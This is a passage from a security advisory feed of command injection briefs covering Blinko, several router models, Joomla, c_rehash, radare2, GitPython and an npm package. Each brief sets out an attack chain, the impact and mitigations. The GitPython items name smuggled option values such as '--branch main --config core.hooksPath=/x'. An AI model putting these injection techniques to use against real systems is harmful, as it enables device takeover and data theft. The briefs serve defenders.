]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>npm</category><category>CVE-2026-26830</category><category>pdf</category></item><item><title>Blinko Pre-1.8.4 OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-03-blinko-command-injection/</link><pubDate>Wed, 25 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-blinko-command-injection/</guid><description>Blinko versions before 1.8.4 are vulnerable to OS Command Injection (CWE-78), where the MCP server creation function allows specifying arbitrary commands and arguments that are executed when testing the connection, potentially leading to code execution for attackers with high privileges.</description><content:encoded><![CDATA[<p>Blinko, an AI-powered card note-taking application, is vulnerable to an OS Command Injection flaw (CVE-2026-23882) in versions prior to 1.8.4. The vulnerability lies within the Model Context Protocol (MCP) server creation function, which allows for the specification of arbitrary commands and arguments. These commands are executed when the application tests the connection to the MCP server. Successful exploitation of this vulnerability can allow an attacker with high privileges to execute arbitrary code on the system running Blinko. Users of Blinko are advised to upgrade to version 1.8.4 to remediate this vulnerability.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains high-privileged access to the Blinko application.</li>
<li>Attacker navigates to the MCP server creation function within Blinko.</li>
<li>Attacker injects malicious commands into the command or arguments fields of the MCP server creation form.</li>
<li>Blinko attempts to establish a connection to the attacker-controlled MCP server using the injected command.</li>
<li>The injected command executes on the Blinko server due to insufficient input sanitization.</li>
<li>Attacker achieves arbitrary code execution on the Blinko server.</li>
<li>Attacker leverages the compromised Blinko instance to further compromise the host system or other internal resources.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-23882 can allow an attacker with high privileges to achieve arbitrary code execution on systems running vulnerable versions of Blinko. This can lead to full system compromise, data theft, or denial-of-service. While the exact number of affected Blinko installations is unknown, any Blinko instance running a version prior to 1.8.4 is susceptible to this vulnerability if an attacker gains high-privileged access to the application.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade Blinko to version 1.8.4 or later to patch CVE-2026-23882 (see references for the release notes).</li>
<li>Monitor network traffic for connections to unusual or unexpected external IPs originating from Blinko processes after updates.</li>
<li>Implement strict input validation and sanitization on all user-supplied input within the Blinko application to prevent command injection attacks in the future.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cve-2026-23882</category><category>command-injection</category><category>blinko</category></item><item><title>TOTOLINK X6000R Remote Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-03-totolink-rce/</link><pubDate>Tue, 24 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-totolink-rce/</guid><description>A remote command injection vulnerability exists in TOTOLINK X6000R routers, specifically versions 9.4.0cu.1360_B20241207 and 9.4.0cu.1498_B20250826, allowing attackers to execute arbitrary commands via manipulation of the Hostname argument in the setLanCfg function.</description><content:encoded><![CDATA[<p>A critical vulnerability, CVE-2026-4611, affects TOTOLINK X6000R routers running firmware versions 9.4.0cu.1360_B20241207 and 9.4.0cu.1498_B20250826. This vulnerability allows a remote attacker to inject operating system commands by manipulating the Hostname argument passed to the <code>setLanCfg</code> function within the <code>/usr/sbin/shttpd</code> binary. Successful exploitation grants the attacker the ability to execute arbitrary commands with elevated privileges on the router. Given the widespread deployment of these routers in home and small office networks, this vulnerability poses a significant risk of compromise, potentially leading to data theft, botnet recruitment, or denial-of-service attacks. The vulnerability was reported on March 23, 2026.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a vulnerable TOTOLINK X6000R router running firmware version 9.4.0cu.1360_B20241207 or 9.4.0cu.1498_B20250826.</li>
<li>The attacker crafts a malicious HTTP request targeting the <code>/usr/sbin/shttpd</code> web server.</li>
<li>The malicious request includes a modified <code>Hostname</code> argument within the <code>setLanCfg</code> function call.</li>
<li>The <code>Hostname</code> argument contains OS command injection payloads such as backticks, semicolons, or command chaining operators (e.g., <code>&amp;&amp;</code>, <code>||</code>).</li>
<li>The <code>shttpd</code> process, running with elevated privileges, processes the malicious <code>Hostname</code> argument without proper sanitization.</li>
<li>The injected OS commands are executed by the system shell, leading to arbitrary code execution.</li>
<li>The attacker gains control of the router&rsquo;s operating system.</li>
<li>The attacker can then perform a variety of malicious actions, such as exfiltrating sensitive data, modifying router configurations, or using the router as a foothold for further network attacks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-4611 allows attackers to execute arbitrary commands on vulnerable TOTOLINK X6000R routers. This could lead to a complete compromise of the device, allowing attackers to steal sensitive information such as Wi-Fi passwords, intercept network traffic, or use the router as a launching point for attacks against other devices on the network. Given the potential for widespread exploitation, a large number of home and small business networks could be affected, resulting in significant financial and reputational damage.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor web server logs (category: <code>webserver</code>, product: <code>linux</code>) for requests containing suspicious characters or command injection attempts within the <code>Hostname</code> argument when accessing the <code>/usr/sbin/shttpd</code> endpoint.</li>
<li>Implement the provided Sigma rule to detect exploitation attempts in web server logs.</li>
<li>Contact TOTOLINK for a security patch or upgrade guidance.</li>
<li>Consider implementing network segmentation to limit the impact of a compromised router.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>totolink</category><category>rce</category><category>command-injection</category><category>cve-2026-4611</category></item><item><title>D-Link DIR-825/825R OS Command Injection Vulnerability (CVE-2026-4627)</title><link>https://feed.craftedsignal.io/briefs/2026-03-dlink-command-injection/</link><pubDate>Tue, 24 Mar 2026 05:16:24 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-dlink-command-injection/</guid><description>CVE-2026-4627 is an OS command injection vulnerability in the handler_update_system_time function of the libdeuteron_modules.so file in the NTP Service component of D-Link DIR-825 and DIR-825R devices, which can be exploited remotely by authenticated attackers.</description><content:encoded><![CDATA[<p>CVE-2026-4627 is an OS command injection vulnerability affecting D-Link DIR-825 and DIR-825R routers, specifically versions 1.0.5 and 4.5.1. The vulnerability resides within the <code>handler_update_system_time</code> function of the <code>libdeuteron_modules.so</code> file, which is part of the NTP service. An attacker with administrative privileges can inject arbitrary OS commands by manipulating the input to this function. The vulnerability can be exploited remotely, allowing a threat actor to potentially gain…</p>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>router</category><category>legacy-device</category></item><item><title>Joomla com_mb24sysapi Module Unauthenticated RCE (CVE-2026-32968)</title><link>https://feed.craftedsignal.io/briefs/2026-03-joomla-rce/</link><pubDate>Mon, 23 Mar 2026 12:16:08 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-joomla-rce/</guid><description>An unauthenticated remote attacker can exploit an OS command injection vulnerability (CVE-2026-32968) in the com_mb24sysapi module of Joomla, leading to remote code execution and full system compromise.</description><content:encoded>&lt;p>CVE-2026-32968 describes a critical remote code execution (RCE) vulnerability affecting the com_mb24sysapi module in Joomla. The vulnerability stems from improper neutralization of special elements within OS commands, allowing an unauthenticated remote attacker to inject arbitrary commands. Successful exploitation of this vulnerability can lead to complete compromise of the affected system. This vulnerability is identified as a variant of CVE-2020-10383, suggesting a similar underlying flaw…&lt;/p>
</content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-32968</category><category>joomla</category><category>rce</category><category>command-injection</category></item><item><title>Linksys MR9600 SmartConnect OS Command Injection (CVE-2026-4558)</title><link>https://feed.craftedsignal.io/briefs/2026-03-linksys-rce/</link><pubDate>Mon, 23 Mar 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-03-linksys-rce/</guid><description>A remote OS command injection vulnerability exists in the Linksys MR9600 router version 2.0.6.206937, allowing attackers to execute arbitrary commands by manipulating specific function arguments via the SmartConnect.lua file.</description><content:encoded><![CDATA[<p>CVE-2026-4558 is a critical vulnerability affecting Linksys MR9600 routers, specifically version 2.0.6.206937. The flaw resides within the <code>smartConnectConfigure</code> function of the <code>SmartConnect.lua</code> file. Attackers can remotely inject OS commands by manipulating the <code>configApSsid</code>, <code>configApPassphrase</code>, <code>srpLogin</code>, or <code>srpPassword</code> arguments. Publicly available exploits exist, increasing the risk of exploitation. The vendor was notified but has not yet provided a patch or response, leaving users…</p>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>CVE-2026-4558</category><category>linksys</category><category>command-injection</category><category>network-device</category></item><item><title>Critical Command Injection Vulnerability in Zyxel Routers (CVE-2026-13942)</title><link>https://feed.craftedsignal.io/briefs/2026-02-zyxel-rce/</link><pubDate>Fri, 27 Feb 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-02-zyxel-rce/</guid><description>A critical command injection vulnerability (CVE-2026-13942) in the UPnP function of Zyxel routers allows remote attackers to execute arbitrary operating system commands by sending crafted UPnP SOAP requests.</description><content:encoded>&lt;p>A critical command injection vulnerability, tracked as CVE-2026-13942, has been discovered in the UPnP (Universal Plug and Play) service of Zyxel routers. The vulnerability stems from insufficient validation of input within the UPnP SOAP request processing.  An unauthenticated, remote attacker can exploit this flaw by sending specially crafted UPnP SOAP requests to the affected device. This allows the attacker to inject and execute arbitrary operating system commands with elevated privileges on…&lt;/p>
</content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>zyxel</category><category>router</category><category>command injection</category><category>cve-2026-13942</category><category>upnp</category></item><item><title>CVE-2022-2068 c_rehash Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-30-cve-2022-2068-command-injection/</link><pubDate>Tue, 30 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-30-cve-2022-2068-command-injection/</guid><description>CVE-2022-2068 is a command injection vulnerability in the c_rehash script, requiring immediate attention to prevent potential arbitrary code execution.</description><content:encoded><![CDATA[<p>CVE-2022-2068 describes a command injection vulnerability present within the <code>c_rehash</code> script. This script is often used to update certificate symlinks. Successful exploitation of this vulnerability can lead to arbitrary code execution on the target system. While the Microsoft Security Response Center (MSRC) has published information regarding this vulnerability, the specifics of affected products and exploitation details require further investigation and are not explicitly detailed in the provided source. Defenders must prioritize identifying and mitigating potential attack vectors related to this vulnerability to prevent system compromise. Given the nature of command injection vulnerabilities, the impact can be severe, ranging from data theft to complete system takeover.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a system where the <code>c_rehash</code> script is accessible and executable. This could involve techniques like exploiting a separate web application vulnerability, or through compromised credentials.</li>
<li>The attacker crafts a malicious certificate file or modifies an existing one to include command injection payloads within the certificate&rsquo;s subject or other relevant fields.</li>
<li>The attacker executes the <code>c_rehash</code> script, pointing it towards the directory containing the malicious certificate.</li>
<li>During execution, the <code>c_rehash</code> script parses the certificate, unknowingly extracting the malicious payload embedded within the certificate&rsquo;s fields.</li>
<li>The script then attempts to use the extracted payload as part of a command, due to the lack of proper sanitization or validation of the input.</li>
<li>The injected command is executed with the privileges of the user running the <code>c_rehash</code> script, potentially leading to arbitrary code execution.</li>
<li>The attacker leverages the code execution to install malware, establish persistence, or escalate privileges.</li>
<li>The attacker achieves their final objective, such as data exfiltration, system disruption, or lateral movement within the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2022-2068 allows attackers to execute arbitrary commands on a vulnerable system. The impact can range from data theft and malware installation to complete system compromise and lateral movement within the network. This vulnerability poses a significant risk to organizations that rely on the <code>c_rehash</code> script for managing certificates. The lack of specific victim counts or sector targeting information in the provided source highlights the need for proactive detection and mitigation efforts across all potentially affected environments.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor process executions for instances of the <code>c_rehash</code> script executing with unusual or suspicious command-line arguments. Deploy the provided Sigma rule (<code>c_rehash_command_injection</code>) to detect this behavior.</li>
<li>Implement input validation and sanitization measures for all certificate-related operations, particularly when using scripts like <code>c_rehash</code>.</li>
<li>Investigate systems where the <code>c_rehash</code> script is used to identify potential exploitation attempts related to CVE-2022-2068.</li>
<li>Monitor file system events for the creation or modification of certificates containing suspicious payloads, as these may be used in conjunction with the vulnerability. Deploy the provided Sigma rule (<code>suspicious_certificate_creation</code>) to detect such activity.</li>
<li>Regularly review and update certificate management procedures to ensure they align with security best practices and mitigate potential vulnerabilities.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2022-2068</category><category>command-injection</category><category>c_rehash</category><category>certificate-management</category></item><item><title>radare2 PDB Parser Command Injection Vulnerability (CVE-2026-40517)</title><link>https://feed.craftedsignal.io/briefs/2024-01-radare2-command-injection/</link><pubDate>Wed, 24 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-radare2-command-injection/</guid><description>A command injection vulnerability exists in radare2 versions prior to 6.1.4, where a crafted PDB file with newline characters in symbol names can inject arbitrary radare2 commands, leading to arbitrary OS command execution.</description><content:encoded><![CDATA[<p>A command injection vulnerability, identified as CVE-2026-40517, affects radare2 versions prior to 6.1.4. This flaw resides within the PDB parser&rsquo;s <code>print_gvars()</code> function. An attacker can exploit this vulnerability by creating a malicious PDB file containing newline characters within symbol names. These newline characters enable the injection of arbitrary radare2 commands, which are then executed due to unsanitized symbol name interpolation. This interpolation occurs during the execution of the <code>idp</code> command against the malicious PDB file. Successful exploitation allows the attacker to achieve arbitrary OS command execution through radare2&rsquo;s shell execution operator, posing a significant risk to systems where radare2 is used for binary analysis.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker crafts a malicious PDB file. This file contains newline characters embedded within symbol names.</li>
<li>The crafted PDB file is delivered to the target system, potentially through social engineering or as part of a larger attack chain.</li>
<li>A user, unaware of the malicious nature of the PDB file, attempts to analyze it using radare2.</li>
<li>The user executes the <code>idp</code> command within radare2 to parse and load debug symbols from the PDB file.</li>
<li>During the parsing process, the <code>print_gvars()</code> function is called within the PDB parser.</li>
<li>The function attempts to rename flags based on the symbol names read from the PDB file.</li>
<li>Due to the lack of proper sanitization, the newline characters in the symbol names are interpreted as command separators.</li>
<li>The injected radare2 commands are executed by the shell execution operator, leading to arbitrary OS command execution. The attacker achieves arbitrary command execution on the system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the system where radare2 is running. The impact ranges from system compromise and data theft to denial of service, depending on the privileges of the user running radare2 and the commands injected by the attacker. The CVSS v3.1 base score is rated as 7.8 (High).</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade radare2 to version 6.1.4 or later to patch CVE-2026-40517.</li>
<li>Implement strict input validation and sanitization for PDB files processed by radare2 to prevent command injection.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Radare2 Process Execution</code> to identify potential exploitation attempts.</li>
<li>Monitor radare2 process execution for unusual command line arguments (see <code>Detect Suspicious Radare2 Process Execution</code>).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>radare2</category><category>CVE-2026-40517</category></item><item><title>Totolink A8000RU OS Command Injection Vulnerability (CVE-2026-7154)</title><link>https://feed.craftedsignal.io/briefs/2024-01-totolink-a8000ru-command-injection/</link><pubDate>Tue, 23 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-totolink-a8000ru-command-injection/</guid><description>A remote OS command injection vulnerability exists in the Totolink A8000RU router version 7.1cu.643_b20200521, allowing attackers to execute arbitrary commands by manipulating the 'tty_server' argument in the 'setAdvancedInfoShow' function.</description><content:encoded><![CDATA[<p>CVE-2026-7154 describes a critical vulnerability affecting the Totolink A8000RU router, specifically version 7.1cu.643_b20200521. The vulnerability is located in the <code>setAdvancedInfoShow</code> function within the <code>/cgi-bin/cstecgi.cgi</code> file, which handles CGI requests. An attacker can remotely exploit this flaw by manipulating the <code>tty_server</code> argument, leading to OS command injection. This means an unauthenticated attacker can potentially execute arbitrary commands on the underlying operating system of the router. The exploit is publicly available, increasing the likelihood of exploitation in the wild. Successful exploitation allows complete control over the device.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable Totolink A8000RU router with the affected firmware version exposed to the internet.</li>
<li>The attacker crafts a malicious HTTP POST request targeting the <code>/cgi-bin/cstecgi.cgi</code> endpoint.</li>
<li>The crafted request includes the <code>setAdvancedInfoShow</code> function call with a manipulated <code>tty_server</code> argument containing an OS command injection payload.</li>
<li>The webserver receives the crafted request and passes the <code>tty_server</code> argument to the vulnerable function.</li>
<li>The vulnerable function executes the attacker-supplied OS command due to insufficient input validation and sanitization.</li>
<li>The injected command executes with the privileges of the web server process, typically root.</li>
<li>The attacker gains arbitrary code execution on the router&rsquo;s operating system.</li>
<li>The attacker can then use this access to install malware, change router settings, or use the router as a pivot point for further attacks within the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-7154 allows a remote, unauthenticated attacker to execute arbitrary commands on the affected Totolink A8000RU router. This can lead to complete compromise of the device, potentially affecting all connected devices on the network. An attacker could steal sensitive information, disrupt network services, or use the compromised router as a botnet node. Given the public availability of the exploit, mass exploitation is a significant risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor web server logs for suspicious POST requests to <code>/cgi-bin/cstecgi.cgi</code> with unusual characters or command-like syntax in the <code>tty_server</code> parameter, as this could indicate exploitation attempts (see example Sigma rule below).</li>
<li>Implement network intrusion detection system (IDS) rules to detect attempts to exploit this vulnerability by monitoring HTTP traffic for malicious payloads in the <code>tty_server</code> parameter.</li>
<li>Apply available patches or firmware updates provided by Totolink to address CVE-2026-7154 when they become available.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">threat</category><category>cve-2026-7154</category><category>command-injection</category><category>network-device</category></item><item><title>GitPython Vulnerability Allows Arbitrary Code Execution via Git Hooks</title><link>https://feed.craftedsignal.io/briefs/2024-01-23-gitpython-hook-execution/</link><pubDate>Tue, 23 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-23-gitpython-hook-execution/</guid><description>A vulnerability in GitPython versions prior to 3.1.47 allows for command execution during repository cloning by manipulating the `multi_options` parameter to inject malicious Git configurations, such as `core.hooksPath`, leading to the execution of attacker-controlled hooks.</description><content:encoded><![CDATA[<p>GitPython before version 3.1.47 is susceptible to a command execution vulnerability. The issue stems from how the <code>_clone()</code> function validates the <code>multi_options</code> parameter used in the <code>clone_from()</code>, <code>clone()</code>, or <code>Submodule.update()</code> methods. Specifically, the validation occurs on the original list of options before the <code>shlex.split</code> transformation. This allows an attacker to craft a string like <code>&quot;--branch main --config core.hooksPath=/x&quot;</code> which passes the initial validation because it starts with a safe option (<code>--branch</code>). However, after the string is split into tokens, the <code>--config</code> option becomes active, allowing the attacker to inject a malicious <code>core.hooksPath</code> configuration. This configuration points Git to a directory containing attacker-controlled Git hooks, which are then executed during the clone operation. This vulnerability is similar in nature to CVE-2023-40267.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a vulnerable application using GitPython to clone repositories.</li>
<li>The attacker crafts a malicious string containing a Git configuration option, such as <code>--config core.hooksPath=/path/to/malicious/hooks</code>, embedded within a seemingly benign option string like <code>--branch main --config core.hooksPath=/path/to/malicious/hooks</code>.</li>
<li>The attacker injects this malicious string into the <code>multi_options</code> parameter of the <code>clone_from()</code>, <code>clone()</code>, or <code>Submodule.update()</code> methods.</li>
<li>GitPython&rsquo;s <code>_clone()</code> function validates the <code>multi_options</code> parameter using <code>Git.check_unsafe_options()</code> <em>before</em> it is processed by <code>shlex.split()</code>.</li>
<li>Because the malicious string starts with a safe option (<code>--branch</code>), it bypasses the validation check.</li>
<li>The <code>shlex.split()</code> function then transforms the string into a list of individual options, making the <code>--config</code> option active.</li>
<li>The <code>git clone</code> command is executed with the injected <code>--config core.hooksPath=/path/to/malicious/hooks</code> option, causing Git to use the attacker-controlled directory for Git hooks.</li>
<li>Git executes the malicious hooks (e.g., <code>post-checkout</code>), resulting in arbitrary code execution on the victim&rsquo;s machine.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the system where the GitPython library is used. Any application that passes user-supplied input to the <code>multi_options</code> parameter of the affected functions is vulnerable. This can lead to complete system compromise, data exfiltration, or denial of service. The vulnerability affects GitPython versions prior to 3.1.47.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade GitPython to version 3.1.47 or later to patch the vulnerability (Affected Packages).</li>
<li>Implement input validation and sanitization for any user-supplied input used to construct the <code>multi_options</code> parameter to prevent injection of malicious Git configurations (Code).</li>
<li>Monitor process creation events for the execution of unexpected processes from directories specified as <code>core.hooksPath</code> (see Sigma rule <code>Detect Suspicious Git Hook Execution</code>).</li>
<li>Deploy the Sigma rules in this brief to your SIEM and tune for your environment.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>gitpython</category><category>code-execution</category><category>git-hooks</category><category>command-injection</category></item><item><title>GitPython Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-gitpython-cmd-injection/</link><pubDate>Tue, 09 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-gitpython-cmd-injection/</guid><description>GitPython versions 3.1.30 through 3.1.46 are vulnerable to command injection by passing attacker-controlled kwargs into `Repo.clone_from()`, `Remote.fetch()`, `Remote.pull()`, or `Remote.push()`, leading to arbitrary command execution due to bypassed safety checks.</description><content:encoded><![CDATA[<p>GitPython, a library providing programmatic interaction with Git repositories, is susceptible to a command injection vulnerability in versions 3.1.30 to 3.1.46. The vulnerability stems from insufficient validation of keyword arguments (kwargs) passed to functions like <code>Repo.clone_from()</code>, <code>Remote.fetch()</code>, <code>Remote.pull()</code>, and <code>Remote.push()</code>. Specifically, when underscore-form kwargs (e.g., <code>upload_pack</code>) are used, they bypass the intended safety checks designed to prevent the execution of arbitrary commands via Git options like <code>--upload-pack</code>. This occurs because the validation logic only checks for hyphenated forms (e.g., <code>upload-pack</code>). Attackers can exploit this by injecting malicious commands through these kwargs, even when <code>allow_unsafe_options</code> is set to its default value of <code>False</code>. This issue was reported on April 25, 2026.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a web application or system that uses GitPython to manage Git repositories.</li>
<li>The attacker finds an endpoint or function where they can control kwargs passed to <code>Repo.clone_from()</code>, <code>Remote.fetch()</code>, <code>Remote.pull()</code>, or <code>Remote.push()</code>.</li>
<li>The attacker crafts a malicious payload, using underscore-form kwargs such as <code>upload_pack</code> or <code>receive_pack</code>, setting their value to a command they want to execute (e.g., a shell script path or a direct command).</li>
<li>The application or system, using a vulnerable version of GitPython, receives these kwargs and bypasses the intended safety check.</li>
<li>GitPython&rsquo;s <code>Git.transform_kwarg()</code> method converts the underscore-form kwargs into their corresponding hyphenated Git options (e.g., <code>upload_pack</code> becomes <code>--upload-pack</code>).</li>
<li>The Git command is executed with the attacker-controlled option, leading to arbitrary command execution on the system.</li>
<li>The attacker gains unauthorized access, potentially stealing credentials, modifying repositories, or moving laterally within the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability can lead to severe consequences, especially in web applications, CI/CD systems, and automation tools that rely on GitPython for repository management. Attackers could steal SSH keys, API tokens, cloud credentials, or other sensitive information. They could also modify repositories, build outputs, or release artifacts, leading to supply chain attacks. In CI/CD environments, this vulnerability could enable lateral movement from worker nodes or compromise the entire automation infrastructure. The number of affected systems depends on the prevalence of vulnerable GitPython versions in exposed applications.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade GitPython to version 3.1.47 or later to remediate the vulnerability (affected_products).</li>
<li>Review code that uses <code>Repo.clone_from()</code>, <code>Remote.fetch()</code>, <code>Remote.pull()</code>, or <code>Remote.push()</code> and ensure that kwargs are properly validated to prevent attacker-controlled input (references).</li>
<li>Implement input validation to block underscore-form kwargs such as <code>upload_pack</code> or <code>receive_pack</code> before they are passed to GitPython functions (references).</li>
<li>Deploy the Sigma rule <code>Detect GitPython Kwarg Command Injection</code> to identify potential exploitation attempts in application logs (rules).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>gitpython</category><category>vulnerability</category></item><item><title>Evolver Remote Code Execution via Command Injection in `_extractLLM()`</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-evolver-rce/</link><pubDate>Tue, 09 Jan 2024 10:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-evolver-rce/</guid><description>A command injection vulnerability in the `_extractLLM()` function of the evolver application allows remote attackers to execute arbitrary shell commands by injecting shell metacharacters into the `corpus` parameter, leading to potential system compromise.</description><content:encoded><![CDATA[<p>A command injection vulnerability exists in the <code>_extractLLM()</code> function within the <code>src/gep/signals.js</code> file of the evolver application, specifically in versions prior to 1.69.3. The vulnerability stems from the function&rsquo;s construction of a <code>curl</code> command via string concatenation, incorporating the <code>corpus</code> parameter without sufficient sanitization. This parameter, derived from user input through the <code>extractSignals()</code> function, is susceptible to shell command substitution using the <code>$(...)</code> syntax when processed by <code>execSync()</code>. Successful exploitation grants attackers the ability to execute arbitrary shell commands within the context of the Node.js process. This flaw poses a significant risk, potentially leading to full system compromise, data exfiltration, or the installation of malicious software.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious input string containing shell metacharacters (e.g., <code>$(...)</code>).</li>
<li>This malicious string is passed as the <code>userSnippet</code> parameter to the <code>extractSignals()</code> function within <code>src/gep/evolver.js</code>.</li>
<li>The <code>extractSignals()</code> function processes the user snippet and extracts a summary.</li>
<li>The extracted summary, which includes the malicious payload, is passed as the <code>corpus</code> parameter to the vulnerable <code>_extractLLM()</code> function in <code>src/gep/signals.js</code>.</li>
<li>The <code>_extractLLM()</code> function constructs a <code>curl</code> command by concatenating strings, embedding the unsanitized <code>corpus</code> parameter within the command string.</li>
<li>The <code>curl</code> command is executed using <code>execSync()</code>, which interprets the shell metacharacters and executes the injected commands.</li>
<li>The injected commands are executed with the privileges of the Node.js process.</li>
<li>The attacker achieves remote code execution, enabling them to perform actions such as data exfiltration or system compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the server hosting the evolver application. This can lead to full system compromise, allowing attackers to steal sensitive data, install malware, or pivot to other systems on the network. The vulnerability affects anyone running the evolver with the GEP (Genetic Evolution Protocol) enabled and processing user-provided content. The affected package is npm/@evomap/evolver (vulnerable: &lt; 1.69.3).</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade the <code>@evomap/evolver</code> package to version 1.69.3 or later to patch the vulnerability.</li>
<li>Deploy the Sigma rule &ldquo;Detect Evolver Command Injection Attempt&rdquo; to identify attempts to exploit this vulnerability by detecting shell metacharacters in process execution logs.</li>
<li>Review and sanitize all user-provided content before it is processed by the <code>extractSignals()</code> and <code>_extractLLM()</code> functions.</li>
<li>Implement strict input validation to prevent shell metacharacters from reaching the vulnerable code.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>evolver</category></item><item><title>Totolink A8000RU OS Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-totolink-a8000ru-rce/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-totolink-a8000ru-rce/</guid><description>A remote OS command injection vulnerability exists in Totolink A8000RU version 7.1cu.643_b20200521 via manipulation of the 'proto' argument in the /cgi-bin/cstecgi.cgi CGI handler, potentially leading to complete system compromise.</description><content:encoded><![CDATA[<p>A critical vulnerability, tracked as CVE-2026-7538, has been identified in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This vulnerability resides within the CGI handler component, specifically in the <code>/cgi-bin/cstecgi.cgi</code> file. The vulnerability arises from improper handling of the <code>proto</code> argument, which can be manipulated by an attacker to inject arbitrary operating system commands. Given that the attack can be initiated remotely and a public exploit is available, defenders should prioritize patching or implementing mitigations immediately. Exploitation could allow unauthenticated attackers to gain complete control over the affected device.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a Totolink A8000RU router with the vulnerable firmware version (7.1cu.643_b20200521) exposed to the internet.</li>
<li>The attacker sends a specially crafted HTTP request to the <code>/cgi-bin/cstecgi.cgi</code> endpoint.</li>
<li>The HTTP request includes a malicious payload within the <code>proto</code> argument. This payload is designed to execute arbitrary OS commands.</li>
<li>The CGI handler processes the request without proper sanitization of the <code>proto</code> argument.</li>
<li>The unsanitized input from the <code>proto</code> argument is passed directly to a system call, resulting in OS command injection.</li>
<li>The injected command executes with the privileges of the web server process.</li>
<li>The attacker gains the ability to execute arbitrary code on the router, potentially including downloading and executing a reverse shell.</li>
<li>The attacker establishes a persistent foothold and can perform further malicious activities, such as network reconnaissance, data exfiltration, or using the compromised device as part of a botnet.</li>
</ol>
<h2 id="impact">Impact</h2>
